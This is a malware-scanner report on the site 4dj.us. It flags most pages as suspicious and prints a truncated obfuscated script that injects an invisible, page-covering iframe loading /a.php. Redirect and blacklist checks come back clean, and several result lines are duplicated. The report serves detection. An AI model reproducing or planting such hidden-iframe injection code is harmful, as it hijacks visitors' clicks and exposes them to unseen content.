Scanned pages/files
Request | Server response | Status |
http://4dj.us/ | 200 OK Content-Length: 12722 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var _0x1d2a=["getTime","setTime","cookie"," = ","","; expires = ","toGMTString","; path=/",";","split","length","=","indexOf","substr","replace","dj","trage","Netscape","appName","pageX","clientX","pageY","clientY","left","style","djlist","getElementById","px","top","display","none","focus","djlist8()","900","iframe","getElementsByTagName","onmouseover","onmouseout","attachEvent","undefined","onblur","addEventListener","blur","createElement","class","djlist1","setAttribute","id","src","/a.php","scrolling","no","frameborder","0","opacity:0.00; filter:alpha(opacity=0); -moz-opacity: 0.00;position:absolute;top:0;left:0;z-index:200000;overflow:hidden;height:100%;width:100%;margin-left:0px;","appendChild","body","onmousemove"];function setCookie(_0xd1f7x2,_0x ...[2281 bytes skipped]... | ||
http://hdon.org/wp-content/themes/filme/db/jquery1.7.2.min.js | 200 OK Content-Length: 96778 Content-Type: text/javascript | clean |
http://hdon.org/wp-content/themes/filme/db/sly.min.js | 200 OK Content-Length: 22410 Content-Type: text/javascript | clean |
http://www.google.com/jsapi | 200 OK Content-Length: 24552 Content-Type: text/javascript | clean |
http://4dj.us/ajax/labs.js | 200 OK Content-Length: 4965 Content-Type: text/javascript | clean |
http://4dj.us/popup.js | 200 OK Content-Length: 19465 Content-Type: text/javascript | clean |
http://4dj.us/?q=Christoph+-+Rubberneckin%27+%28Original+Mix%29 | 200 OK Content-Length: 13042 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var _0x1d2a=["getTime","setTime","cookie"," = ","","; expires = ","toGMTString","; path=/",";","split","length","=","indexOf","substr","replace","dj","trage","Netscape","appName","pageX","clientX","pageY","clientY","left","style","djlist","getElementById","px","top","display","none","focus","djlist8()","900","iframe","getElementsByTagName","onmouseover","onmouseout","attachEvent","undefined","onblur","addEventListener","blur","createElement","class","djlist1","setAttribute","id","src","/a.php","scrolling","no","frameborder","0","opacity:0.00; filter:alpha(opacity=0); -moz-opacity: 0.00;position:absolute;top:0;left:0;z-index:200000;overflow:hidden;height:100%;width:100%;margin-left:0px;","appendChild","body","onmousemove"];function setCookie(_0xd1f7x2,_0x ...[2281 bytes skipped]... | ||
http://4dj.us/?q=Dawson+Viegas+Anthony+Poteat+-+Never+Give+Up+Original+Mix+Insomniafm+Records | 200 OK Content-Length: 13290 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var _0x1d2a=["getTime","setTime","cookie"," = ","","; expires = ","toGMTString","; path=/",";","split","length","=","indexOf","substr","replace","dj","trage","Netscape","appName","pageX","clientX","pageY","clientY","left","style","djlist","getElementById","px","top","display","none","focus","djlist8()","900","iframe","getElementsByTagName","onmouseover","onmouseout","attachEvent","undefined","onblur","addEventListener","blur","createElement","class","djlist1","setAttribute","id","src","/a.php","scrolling","no","frameborder","0","opacity:0.00; filter:alpha(opacity=0); -moz-opacity: 0.00;position:absolute;top:0;left:0;z-index:200000;overflow:hidden;height:100%;width:100%;margin-left:0px;","appendChild","body","onmousemove"];function setCookie(_0xd1f7x2,_0x ...[2281 bytes skipped]... | ||
http://4dj.us/?q=Justin+Harris+-+Grips+To+The+Edge+Original+Mixviva+Recordings | 200 OK Content-Length: 13185 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var _0x1d2a=["getTime","setTime","cookie"," = ","","; expires = ","toGMTString","; path=/",";","split","length","=","indexOf","substr","replace","dj","trage","Netscape","appName","pageX","clientX","pageY","clientY","left","style","djlist","getElementById","px","top","display","none","focus","djlist8()","900","iframe","getElementsByTagName","onmouseover","onmouseout","attachEvent","undefined","onblur","addEventListener","blur","createElement","class","djlist1","setAttribute","id","src","/a.php","scrolling","no","frameborder","0","opacity:0.00; filter:alpha(opacity=0); -moz-opacity: 0.00;position:absolute;top:0;left:0;z-index:200000;overflow:hidden;height:100%;width:100%;margin-left:0px;","appendChild","body","onmousemove"];function setCookie(_0xd1f7x2,_0x ...[2281 bytes skipped]... | ||
http://4dj.us/?q=Tom+Fall+Feat+Jwaydan | 200 OK Content-Length: 12904 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var _0x1d2a=["getTime","setTime","cookie"," = ","","; expires = ","toGMTString","; path=/",";","split","length","=","indexOf","substr","replace","dj","trage","Netscape","appName","pageX","clientX","pageY","clientY","left","style","djlist","getElementById","px","top","display","none","focus","djlist8()","900","iframe","getElementsByTagName","onmouseover","onmouseout","attachEvent","undefined","onblur","addEventListener","blur","createElement","class","djlist1","setAttribute","id","src","/a.php","scrolling","no","frameborder","0","opacity:0.00; filter:alpha(opacity=0); -moz-opacity: 0.00;position:absolute;top:0;left:0;z-index:200000;overflow:hidden;height:100%;width:100%;margin-left:0px;","appendChild","body","onmousemove"];function setCookie(_0xd1f7x2,_0x ...[2281 bytes skipped]... | ||
http://4dj.us/?q=Arnej+Rework+Arva | 200 OK Content-Length: 12881 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var _0x1d2a=["getTime","setTime","cookie"," = ","","; expires = ","toGMTString","; path=/",";","split","length","=","indexOf","substr","replace","dj","trage","Netscape","appName","pageX","clientX","pageY","clientY","left","style","djlist","getElementById","px","top","display","none","focus","djlist8()","900","iframe","getElementsByTagName","onmouseover","onmouseout","attachEvent","undefined","onblur","addEventListener","blur","createElement","class","djlist1","setAttribute","id","src","/a.php","scrolling","no","frameborder","0","opacity:0.00; filter:alpha(opacity=0); -moz-opacity: 0.00;position:absolute;top:0;left:0;z-index:200000;overflow:hidden;height:100%;width:100%;margin-left:0px;","appendChild","body","onmousemove"];function setCookie(_0xd1f7x2,_0x ...[2281 bytes skipped]... | ||
http://4dj.us/?q=Everybodyus+Radio+Edit+Drm | 200 OK Content-Length: 12944 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var _0x1d2a=["getTime","setTime","cookie"," = ","","; expires = ","toGMTString","; path=/",";","split","length","=","indexOf","substr","replace","dj","trage","Netscape","appName","pageX","clientX","pageY","clientY","left","style","djlist","getElementById","px","top","display","none","focus","djlist8()","900","iframe","getElementsByTagName","onmouseover","onmouseout","attachEvent","undefined","onblur","addEventListener","blur","createElement","class","djlist1","setAttribute","id","src","/a.php","scrolling","no","frameborder","0","opacity:0.00; filter:alpha(opacity=0); -moz-opacity: 0.00;position:absolute;top:0;left:0;z-index:200000;overflow:hidden;height:100%;width:100%;margin-left:0px;","appendChild","body","onmousemove"];function setCookie(_0xd1f7x2,_0x ...[2281 bytes skipped]... | ||
http://4dj.us/?q=Sebastian+Ingrosso+Alesso+-+Calling+Lose+My+Mindfeat+Ryan+Tedderteh+Noizee+Extended+Re | 200 OK Content-Length: 13364 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var _0x1d2a=["getTime","setTime","cookie"," = ","","; expires = ","toGMTString","; path=/",";","split","length","=","indexOf","substr","replace","dj","trage","Netscape","appName","pageX","clientX","pageY","clientY","left","style","djlist","getElementById","px","top","display","none","focus","djlist8()","900","iframe","getElementsByTagName","onmouseover","onmouseout","attachEvent","undefined","onblur","addEventListener","blur","createElement","class","djlist1","setAttribute","id","src","/a.php","scrolling","no","frameborder","0","opacity:0.00; filter:alpha(opacity=0); -moz-opacity: 0.00;position:absolute;top:0;left:0;z-index:200000;overflow:hidden;height:100%;width:100%;margin-left:0px;","appendChild","body","onmousemove"];function setCookie(_0xd1f7x2,_0x ...[2281 bytes skipped]... | ||
http://4dj.us/?q=Axel+Karakasis+-+Humoresque+Original+Mix | 200 OK Content-Length: 13038 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var _0x1d2a=["getTime","setTime","cookie"," = ","","; expires = ","toGMTString","; path=/",";","split","length","=","indexOf","substr","replace","dj","trage","Netscape","appName","pageX","clientX","pageY","clientY","left","style","djlist","getElementById","px","top","display","none","focus","djlist8()","900","iframe","getElementsByTagName","onmouseover","onmouseout","attachEvent","undefined","onblur","addEventListener","blur","createElement","class","djlist1","setAttribute","id","src","/a.php","scrolling","no","frameborder","0","opacity:0.00; filter:alpha(opacity=0); -moz-opacity: 0.00;position:absolute;top:0;left:0;z-index:200000;overflow:hidden;height:100%;width:100%;margin-left:0px;","appendChild","body","onmousemove"];function setCookie(_0xd1f7x2,_0x ...[2281 bytes skipped]... | ||
http://4dj.us/?q=Make+Me+Smile+Original+Mix+Solo+Digital+Music | 200 OK Content-Length: 13076 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var _0x1d2a=["getTime","setTime","cookie"," = ","","; expires = ","toGMTString","; path=/",";","split","length","=","indexOf","substr","replace","dj","trage","Netscape","appName","pageX","clientX","pageY","clientY","left","style","djlist","getElementById","px","top","display","none","focus","djlist8()","900","iframe","getElementsByTagName","onmouseover","onmouseout","attachEvent","undefined","onblur","addEventListener","blur","createElement","class","djlist1","setAttribute","id","src","/a.php","scrolling","no","frameborder","0","opacity:0.00; filter:alpha(opacity=0); -moz-opacity: 0.00;position:absolute;top:0;left:0;z-index:200000;overflow:hidden;height:100%;width:100%;margin-left:0px;","appendChild","body","onmousemove"];function setCookie(_0xd1f7x2,_0x ...[2281 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 4dj.us
Result:
HTTP/1.1 200 OK
Cache-Control: private, must-revalidate
Connection: close
Date: Thu, 23 Oct 2014 00:22:56 GMT
Server: Apache/2.2.15
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Thu, 23 Oct 2014 00:32:56 GMT
X-Powered-By: PHP/5.3.3
GET / HTTP/1.1
Host: 4dj.us
Result:
HTTP/1.1 200 OK
Cache-Control: private, must-revalidate
Connection: close
Date: Thu, 23 Oct 2014 00:22:56 GMT
Server: Apache/2.2.15
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Thu, 23 Oct 2014 00:32:56 GMT
X-Powered-By: PHP/5.3.3
Second query (visit from search engine):
GET / HTTP/1.1
Host: 4dj.us
Referer: http://www.google.com/search?q=4dj.us
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 4dj.us
Referer: http://www.google.com/search?q=4dj.us
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=4dj.us
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://4dj.us/
Result: 4dj.us is not infected or malware details are not published yet.
Result: 4dj.us is not infected or malware details are not published yet.